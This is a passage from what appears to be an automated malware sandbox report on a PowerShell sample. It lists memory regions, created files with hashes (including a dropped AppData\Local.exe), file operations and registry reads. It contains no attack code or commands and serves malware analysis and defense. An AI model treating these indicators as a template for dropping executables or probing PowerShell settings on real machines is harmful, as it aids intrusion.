| microsoft.powershell.security.ni.dll | 0x7fef1960000 | 0x7fef199dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| linkinfo.dll | 0x7fef5040000 | 0x7fef504bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shdocvw.dll | 0x7fef5050000 | 0x7fef5083fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shfolder.dll | 0x7fef5470000 | 0x7fef5476fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntshrui.dll | 0x7fef5870000 | 0x7fef58effff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cscapi.dll | 0x7fef58f0000 | 0x7fef58fefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apphelp.dll | 0x7fef7d30000 | 0x7fef7d86fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| slc.dll | 0x7fefb330000 | 0x7fefb33afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| atl.dll | 0x7fefb360000 | 0x7fefb378fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| uxtheme.dll | 0x7fefbf60000 | 0x7fefbfb5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| propsys.dll | 0x7fefbfc0000 | 0x7fefc0ebfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| comctl32.dll | 0x7fefc140000 | 0x7fefc333fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntmarta.dll | 0x7fefc630000 | 0x7fefc65cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| version.dll | 0x7fefc800000 | 0x7fefc80bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| userenv.dll | 0x7fefc9e0000 | 0x7fefc9fdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rsaenh.dll | 0x7fefcc30000 | 0x7fefcc76fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptsp.dll | 0x7fefcf30000 | 0x7fefcf46fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| srvcli.dll | 0x7fefd430000 | 0x7fefd452fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cryptbase.dll | 0x7fefd530000 | 0x7fefd53efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| profapi.dll | 0x7fefd640000 | 0x7fefd64efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| cfgmgr32.dll | 0x7fefd730000 | 0x7fefd765fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| devobj.dll | 0x7fefd770000 | 0x7fefd789fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x7fefd830000 | 0x7fefd89afff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x7fefda30000 | 0x7fefda4efff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x7fefda50000 | 0x7fefdb18fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x7fefdb20000 | 0x7fefdc4cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x7fefdc50000 | 0x7fefdceefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x7fefdd00000 | 0x7fefdd66fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x7fefdd70000 | 0x7fefdd7dfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x7fefe290000 | 0x7fefe492fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x7fefe4a0000 | 0x7feff227fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| wldap32.dll | 0x7feff230000 | 0x7feff281fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x7feff360000 | 0x7feff3d0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x7feff3e0000 | 0x7feff4bafff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x7feff4c0000 | 0x7feff4edfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| oleaut32.dll | 0x7feff4f0000 | 0x7feff5c6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| setupapi.dll | 0x7feff5d0000 | 0x7feff7a6fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| clbcatq.dll | 0x7feff850000 | 0x7feff8e8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x7feff8f0000 | 0x7feff9f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x7feffa10000 | 0x7feffa10fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007ff00030000 | 0x7ff00030000 | 0x7ff0003ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00040000 | 0x7ff00040000 | 0x7ff0004ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00050000 | 0x7ff00050000 | 0x7ff000effff | Private Memory | - |
|
|
|
- |
| private_0x000007ff000f0000 | 0x7ff000f0000 | 0x7ff000fffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00100000 | 0x7ff00100000 | 0x7ff0016ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00170000 | 0x7ff00170000 | 0x7ff0017ffff | Private Memory | - |
|
|
|
- |
| private_0x000007ff00180000 | 0x7ff00180000 | 0x7ff0018ffff | Private Memory | - |
|
|
|
- |
| private_0x000007fffff10000 | 0x7fffff10000 | 0x7fffff1ffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| private_0x000007fffff20000 | 0x7fffff20000 | 0x7fffffaffff | Private Memory | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000007fffffb0000 | 0x7fffffb0000 | 0x7fffffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000007fffffd3000 | 0x7fffffd3000 | 0x7fffffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd5000 | 0x7fffffd5000 | 0x7fffffd6fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd7000 | 0x7fffffd7000 | 0x7fffffd8fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffd9000 | 0x7fffffd9000 | 0x7fffffdafff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdb000 | 0x7fffffdb000 | 0x7fffffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffdd000 | 0x7fffffdd000 | 0x7fffffddfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000007fffffde000 | 0x7fffffde000 | 0x7fffffdffff | Private Memory | Readable, Writable |
|
|
|
- |
|
For performance reasons, the remaining 76 entries are omitted.
The remaining entries can be found in flog.txt. |
||||||||
Created Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\local\temp\cab618.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar619.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab648.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar649.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab1c88.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar1c89.tmp | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local.exe | 0.00 KB |
MD5:
d41d8cd98f00b204e9800998ecf8427e
SHA1: da39a3ee5e6b4b0d3255bfef95601890afd80709 SHA256: e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab618.tmp | 52.71 KB |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab648.tmp | 52.71 KB |
MD5:
03f9e1f45c0d5fe8e08af7449ba1fa2f
SHA1: da545c3133a914434cce940bae78d8ad180a529a SHA256: 677ffb54bd3cc0e2e66eccaf2f6e6c8e1050286516e4f2ef984a3a3673ccc311 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar619.tmp | 126.77 KB |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar649.tmp | 126.77 KB |
MD5:
4479a52b31b6bde89384fb63854ec382
SHA1: 71386477836e4081befb501a266ccc4c984030e0 SHA256: 8c0f5d09cf41e38cf161b6cdd1c3a76cec845b7c11db267ab800edabf1a23fb2 |
|
|
| c:\users\aetadzjz\appdata\local\temp\cab1c88.tmp | 52.75 KB |
MD5:
06ed9a39ac55eb00dd78e416e1a804f6
SHA1: 270464d1618197d86ff89184ba5ed45708d38bd9 SHA256: 298bba62caa0b61a402f715bb5b8d1d28ecd0b58d9a9b6b8ae7947b39da8b1eb |
|
|
| c:\users\aetadzjz\appdata\local\temp\tar1c89.tmp | 126.95 KB |
MD5:
1dfe86c61a543b557903b5eef1e4fffd
SHA1: a67a046cbacff99f557462256a34b7672be70c0e SHA256: 96e552c153dcfccf832a868a03390597606401829f96c64108df9d5874075355 |
|
|
Modified Files
| Filename | File Size | Hash Values | YARA Match | Actions |
|---|---|---|---|---|
| c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 | 0.34 KB |
MD5:
2d48064647786eedd331a603b0f8b748
SHA1: e8bdcff6a839452bcc761c426bdc4f6943b6d146 SHA256: 5634802ae00b14fffb39497413115b8aad181cd8197985b9927769a9428c2df1 |
|
|
| c:\users\aetadzjz\appdata\locallow\microsoft\cryptneturlcache\metadata\94308059b57b3142e455b38a6eb92015 | 0.34 KB |
MD5:
97c682cd2695e7a9eb61f636441b3d8c
SHA1: 0e26e55e308ca2a2b8ef1dfe90b144118119475e SHA256: 063bc9d0a4289cb971308cec32ee6064899fa08f8c91145a07289f085edd5c49 |
|
|
Host Behavior
File (125)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | CONOUT$ | desired_access = GENERIC_WRITE, GENERIC_READ, share_mode = FILE_SHARE_WRITE |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, FILE_FLAG_SEQUENTIAL_SCAN, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | desired_access = GENERIC_READ, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Users\aETAdzjz\AppData\Local.exe | desired_access = GENERIC_WRITE, file_attributes = FILE_FLAG_OPEN_NO_RECALL, share_mode = FILE_SHARE_READ |
|
1 | |
| Get Info | C:\Windows\assembly\GAC_MSIL\System.Management.Automation\1.0.0.0__31bf3856ad364e35\System.Management.Automation.dll | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.config | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0 | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\types.ps1xml | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\Diagnostics.Format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_type |
|
2 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Windows\System32\WindowsPowerShell\v1.0\DotNetTypes.format.ps1xml | type = file_attributes |
|
1 | |
| Get Info | C:\Users\aETAdzjz | type = file_attributes |
|
1 | |
| Get Info | C:\ | type = file_attributes |
|
4 | |
| Get Info | C:\Users\aETAdzjz\Desktop | type = file_attributes |
|
3 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_attributes |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = file_type |
|
2 | |
| Get Info | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | type = size, size_out = 0 |
|
1 | |
| Get Info | C:\Users\aETAdzjz\AppData\Local.exe | type = file_type |
|
2 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 4096 |
|
43 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 3315 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 781, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 0 |
|
2 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\GetEvent.types.ps1xml | size = 4096, size_out = 436 |
|
1 | |
| Read | - | size = 4096, size_out = 4096 |
|
5 | |
| Read | - | size = 4096, size_out = 2530 |
|
1 | |
| Read | - | size = 542, size_out = 0 |
|
1 | |
| Read | - | size = 4096, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4096 |
|
21 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 4018 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 78, size_out = 0 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 0 |
|
2 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 4096, size_out = 3022 |
|
1 | |
| Read | C:\Windows\System32\WindowsPowerShell\v1.0\WSMan.format.ps1xml | size = 50, size_out = 0 |
|
1 | |
| Read | C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Config\machine.config | size = 4096, size_out = 4096 |
|
5 |
Registry (204)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1 | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Environment | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
9 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Security | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System\PowerShell | - |
|
4 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Application | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\HardwareEvents | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Internet Explorer | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Key Management Service | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Media Center | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\OAlerts | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\EventLog\Windows PowerShell\PowerShell | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | - |
|
2 | |
| Open Key | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = 0, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\Environment | value_name = PSMODULEPATH, data = %SystemRoot%\system32\WindowsPowerShell\v1.0\Modules\, type = REG_EXPAND_SZ |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Environment | value_name = PSMODULEPATH, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = 0, type = REG_SZ |
|
4 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds\Microsoft.PowerShell | value_name = path, data = C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
9 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\WSMAN | value_name = StackVersion, data = 2.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = 0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\PowerShell\1\PowerShellEngine | value_name = ApplicationBase, data = C:\Windows\System32\WindowsPowerShell\v1.0, type = REG_SZ |
|
2 | |
| Read Value | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\PowerShell\1\ShellIds | value_name = PipelineMaxStackSizeMB, type = REG_NONE |
|
1 | |
| Read Value | - | value_name = InstallationType, data = 0, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = InstallationType, data = Client, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = Library, data = 0, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = Library, data = netfxperf.dll, type = REG_SZ |
|
1 | |
| Read Value | - | value_name = IsMultiInstance, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = IsMultiInstance, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | - | value_name = First Counter, data = 4986, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = CategoryOptions, data = 3, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\.net clr networking\Performance | value_name = FileMappingSize, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
